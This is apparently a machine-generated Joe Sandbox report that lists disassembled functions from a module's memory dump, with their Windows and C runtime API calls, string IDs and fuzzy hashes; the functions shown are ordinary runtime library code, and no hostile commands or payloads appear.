                                                                                                                                                                    Function 6E80E510 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 6E80E54F
                                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 6E80E603
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                    • String ID: csm$}mH
                                                                                                                                                                    • API String ID: 3480331319-3967853463
                                                                                                                                                                    • Opcode ID: 1e586b2743d7d848bb707081d40cf0233c9a2a041ac6b0132daf39181689f1d6
                                                                                                                                                                    • Instruction ID: 5506d1bc9729e03cece171d6d363daf49936b5051e2514e0a8e9d5e4e83ddf84
                                                                                                                                                                    • Opcode Fuzzy Hash: 1e586b2743d7d848bb707081d40cf0233c9a2a041ac6b0132daf39181689f1d6
                                                                                                                                                                    • Instruction Fuzzy Hash: F9416D34A006199BCF10CFE8CC94ADFBBA5AF45328F108D55E8299B391E735AA15CB91
                                                                                                                                                                    Function 6E814A2D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 98COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 6E814A9F
                                                                                                                                                                    • GetStringTypeW.KERNEL32(?,-00000008,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,FFFFF9B5), ref: 6E814AF7
                                                                                                                                                                    • __freea.LIBCMT ref: 6E814B04
                                                                                                                                                                      • Part of subcall function 6E811BE2: HeapAlloc.KERNEL32(00000000,6E812BEC,?,?,6E812BEC,00000220,?,00000000,?), ref: 6E811C14
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocHeapStringType__alloca_probe_16__freea
                                                                                                                                                                    • String ID: }mH
                                                                                                                                                                    • API String ID: 324646697-246349140
                                                                                                                                                                    • Opcode ID: 8421e7450f15bcf3f2a6765847c9b1f7a281a3306a16122779ee08143433af12
                                                                                                                                                                    • Instruction ID: 630b8bca7cd522c9313859b9fba927a0b5902b86c3798c7fdcd5d9d56ce7ac61
                                                                                                                                                                    • Opcode Fuzzy Hash: 8421e7450f15bcf3f2a6765847c9b1f7a281a3306a16122779ee08143433af12
                                                                                                                                                                    • Instruction Fuzzy Hash: EE31AF7290521BABDB118FE9CC44EEF3BB9EF84319F010928E814E7191E7348952C7A0
                                                                                                                                                                    Function 6E812770 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 6E812795
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6E81279F
                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 6E8127A6
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLastModuleName__dosmaperr
                                                                                                                                                                    • String ID: }mH
                                                                                                                                                                    • API String ID: 4076908705-246349140
                                                                                                                                                                    • Opcode ID: 652e794955f2d848ce1931888376846d06d580b25a42485f6ada445a8f44f91e
                                                                                                                                                                    • Instruction ID: 6c6a12cc7945e99df00f060b9895641df84e5b57fce400710123da52781d09f2
                                                                                                                                                                    • Opcode Fuzzy Hash: 652e794955f2d848ce1931888376846d06d580b25a42485f6ada445a8f44f91e
                                                                                                                                                                    • Instruction Fuzzy Hash: 45111B7194421EAFDF60DFA8DC49BDE77B8AB19304F104899E40DE7240EB749A84CF94
                                                                                                                                                                    Function 6E80F094 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,6E80F045,00000000,?,00000001,?,?,?,6E80F134,00000001,FlsFree,6E81A5C8,FlsFree), ref: 6E80F0A1
                                                                                                                                                                    • GetLastError.KERNEL32(?,6E80F045,00000000,?,00000001,?,?,?,6E80F134,00000001,FlsFree,6E81A5C8,FlsFree,00000000,?,6E80EB91), ref: 6E80F0AB
                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 6E80F0D3
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                    • String ID: api-ms-
                                                                                                                                                                    • API String ID: 3177248105-2084034818
                                                                                                                                                                    • Opcode ID: e351df61367703ed343cdaf81510a4db67d5f07c5944085d5c8b12ca19cfdcea
                                                                                                                                                                    • Instruction ID: 78d633d442c13887f58e8d553f34de006a2f97da93d33fc84deeaed6219b1b10
                                                                                                                                                                    • Opcode Fuzzy Hash: e351df61367703ed343cdaf81510a4db67d5f07c5944085d5c8b12ca19cfdcea
                                                                                                                                                                    • Instruction Fuzzy Hash: DDE04F70248206BBEF501AE0DC06B993F79AB11B54F208860F90CA88D0D761A614C588
                                                                                                                                                                    Function 6E80F215 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AdjustPointer
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1740715915-0
                                                                                                                                                                    • Opcode ID: 11795dc27f62b734cc1052bb2ab666a5f4f042e2c444b41412dbeb2f13f169ba
                                                                                                                                                                    • Instruction ID: 63424a12ea6eaa841e6930e8a8325a6adb5709954b391157171dc974f50e6e07
                                                                                                                                                                    • Opcode Fuzzy Hash: 11795dc27f62b734cc1052bb2ab666a5f4f042e2c444b41412dbeb2f13f169ba
                                                                                                                                                                    • Instruction Fuzzy Hash: D051E072605206DFEB198FD4DC50BAA73A8FF21324F218D2DE8255B2A0E731E841C798
                                                                                                                                                                    Function 6E811E8D Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 6E813241: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6E81539F,?,00000000,-00000008), ref: 6E8132A2
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6E811EF1
                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 6E811EF8
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?), ref: 6E811F32
                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 6E811F39
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1913693674-0
                                                                                                                                                                    • Opcode ID: 8473bd51adc4c07497cb7dda8cd275253fd19d73765af85a54d5810adb4bc912
                                                                                                                                                                    • Instruction ID: d09b5d9f318558c15ba918a9e6bdd39ea961250c824e83ef6fbeef714f0c4954
                                                                                                                                                                    • Opcode Fuzzy Hash: 8473bd51adc4c07497cb7dda8cd275253fd19d73765af85a54d5810adb4bc912
                                                                                                                                                                    • Instruction Fuzzy Hash: DC21957160C61BAFDB509FEAC8809DBB7BDFF113687008D58E81897690EB35EC148B91
                                                                                                                                                                    Function 6E8132E4 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 6E8132EC
                                                                                                                                                                      • Part of subcall function 6E813241: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6E81539F,?,00000000,-00000008), ref: 6E8132A2
                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6E813324
                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6E813344
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 158306478-0
                                                                                                                                                                    • Opcode ID: adc30926ff7652216400503ee5f90b5c91efcc9c423aad20616ff078ecc7c458
                                                                                                                                                                    • Instruction ID: 462cf3dd5b550e53006f03a97998095a72c3c034645036b290c5b8462692416c
                                                                                                                                                                    • Opcode Fuzzy Hash: adc30926ff7652216400503ee5f90b5c91efcc9c423aad20616ff078ecc7c458
                                                                                                                                                                    • Instruction Fuzzy Hash: 4211D2B291DA1B7FAB0117FA6C8DCEF7A6CEE96A983120D64F804D1140FF24DD4185B5
                                                                                                                                                                    Function 6E817006 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,6E8167C5,00000000,00000001,00000000,?,?,6E815CF3,?,00000000,00000000), ref: 6E81701D
                                                                                                                                                                    • GetLastError.KERNEL32(?,6E8167C5,00000000,00000001,00000000,?,?,6E815CF3,?,00000000,00000000,?,?,?,6E816296,00000000), ref: 6E817029
                                                                                                                                                                      • Part of subcall function 6E816FEF: CloseHandle.KERNEL32(FFFFFFFE,6E817039,?,6E8167C5,00000000,00000001,00000000,?,?,6E815CF3,?,00000000,00000000,?,?), ref: 6E816FFF
                                                                                                                                                                    • ___initconout.LIBCMT ref: 6E817039
                                                                                                                                                                      • Part of subcall function 6E816FB1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6E816FE0,6E8167B2,?,?,6E815CF3,?,00000000,00000000,?), ref: 6E816FC4
                                                                                                                                                                    • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,6E8167C5,00000000,00000001,00000000,?,?,6E815CF3,?,00000000,00000000,?), ref: 6E81704E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2744216297-0
                                                                                                                                                                    • Opcode ID: 009dbfe3c601fa1b25bf5eb72fb948bc9ec4436d4de866b598ebe5acc9a88937
                                                                                                                                                                    • Instruction ID: df6b8a32f00fa0489e7b3654d0c2de92d3fe2b875244a38e056d84fec6c6965d
                                                                                                                                                                    • Opcode Fuzzy Hash: 009dbfe3c601fa1b25bf5eb72fb948bc9ec4436d4de866b598ebe5acc9a88937
                                                                                                                                                                    • Instruction Fuzzy Hash: 64F0153651555ABBCF121FD9CC08ECA3F66FB4A7A1F054858FE1D852A0DA328920EBD4
                                                                                                                                                                    Function 6E812DE8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 177COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 6E81291F: GetOEMCP.KERNEL32(00000000,?,?,00000000,?), ref: 6E81294A
                                                                                                                                                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,6E812C2F,?,00000000,?,00000000,?), ref: 6E812E49
                                                                                                                                                                    • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,6E812C2F,?,00000000,?,00000000,?), ref: 6E812E85
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CodeInfoPageValid
                                                                                                                                                                    • String ID: }mH
                                                                                                                                                                    • API String ID: 546120528-246349140
                                                                                                                                                                    • Opcode ID: bb66b4b9b2d74bc56a0c7eb7e80e3561675cc94881b42d8c0bd3582777c4082b
                                                                                                                                                                    • Instruction ID: 9bb11c05c682d2e2aa1f730056ab33df9bc999bf9b32b2f703d96aaf0dc9c35f
                                                                                                                                                                    • Opcode Fuzzy Hash: bb66b4b9b2d74bc56a0c7eb7e80e3561675cc94881b42d8c0bd3582777c4082b
                                                                                                                                                                    • Instruction Fuzzy Hash: 4E51F47090868B4FE720CFA9C850AEBBBF5EF47304F10496ED09597291E7789545EB90
                                                                                                                                                                    Function 6E804D70 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 6E804E72
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                    • String ID: string too long
                                                                                                                                                                    • API String ID: 909987262-2556327735
                                                                                                                                                                    • Opcode ID: aa82e61f11f4fa8b9317a7254ab965004cf993eb35dc86284a91d9195c040d63
                                                                                                                                                                    • Instruction ID: 460c73765812001b0fcd5cf5013df8c5b278a0c6631609a2fed7f0ffd2c3c623
                                                                                                                                                                    • Opcode Fuzzy Hash: aa82e61f11f4fa8b9317a7254ab965004cf993eb35dc86284a91d9195c040d63
                                                                                                                                                                    • Instruction Fuzzy Hash: 2141F875A846458FCF01CEFDC8E53DE7BE2A7A3325F105E19C8319B395C23A510A8B41
                                                                                                                                                                    Function 6E80F811 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • EncodePointer.KERNEL32(00000000,?), ref: 6E80F836
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: EncodePointer
                                                                                                                                                                    • String ID: MOC$RCC
                                                                                                                                                                    • API String ID: 2118026453-2084237596
                                                                                                                                                                    • Opcode ID: f6eb4f3f8139d210d2109bc95a74e032f30865fa9abdc28e0fcf7f66ba4d78e0
                                                                                                                                                                    • Instruction ID: f360ecb3a3e239e5eea3775275b3d07f9554b391d537b5407dba39c21164c03a
                                                                                                                                                                    • Opcode Fuzzy Hash: f6eb4f3f8139d210d2109bc95a74e032f30865fa9abdc28e0fcf7f66ba4d78e0
                                                                                                                                                                    • Instruction Fuzzy Hash: 4D415872A0020AAFDF06CFD8CC81AEEBBB6BF58304F248859F914B6264D335D951DB55
                                                                                                                                                                    Function 6E815F71 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104fileCOMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,6E81630B,00000000,6E813F27,?,00000000,?,00000000,00000000,00000000,?,?), ref: 6E81605A
                                                                                                                                                                    • GetLastError.KERNEL32(6E81630B,00000000,6E813F27,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,6E814094,?), ref: 6E81608A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLastWrite
                                                                                                                                                                    • String ID: }mH
                                                                                                                                                                    • API String ID: 442123175-246349140
                                                                                                                                                                    • Opcode ID: deb9d7dcaba948fd8dbb0581ff305c3ce5465142e051ef97f12031931b9fa185
                                                                                                                                                                    • Instruction ID: 4280336b5c69a8f91fc401c900a4744ac2197219abc3c9da1b69da3ec40aaf5e
                                                                                                                                                                    • Opcode Fuzzy Hash: deb9d7dcaba948fd8dbb0581ff305c3ce5465142e051ef97f12031931b9fa185
                                                                                                                                                                    • Instruction Fuzzy Hash: 5131967171421B9FEB14CFADCC91AEA73B9EB44304F1444A9E509E7290DB70ED80CB61
                                                                                                                                                                    Function 6E815E88 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82fileCOMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,6E8162F4,00000000,6E813F27,?,00000000,?,00000000), ref: 6E815F32
                                                                                                                                                                    • GetLastError.KERNEL32(?,6E8162F4,00000000,6E813F27,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,6E814094), ref: 6E815F58
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLastWrite
                                                                                                                                                                    • String ID: }mH
                                                                                                                                                                    • API String ID: 442123175-246349140
                                                                                                                                                                    • Opcode ID: 54145c4936b2d37a21aaa23ff8a2c3df7d21259bca66fab8272a8ef7285a42fc
                                                                                                                                                                    • Instruction ID: 5bc27a0e99f001b0dfb2e151ba6fe687bec52f5a3722f0624eda548c8470837e
                                                                                                                                                                    • Opcode Fuzzy Hash: 54145c4936b2d37a21aaa23ff8a2c3df7d21259bca66fab8272a8ef7285a42fc
                                                                                                                                                                    • Instruction Fuzzy Hash: CF218031A0431A9FDB24CF59CC819DAB3B9FF49314F1448AAE91AD7250D730EE81CBA1
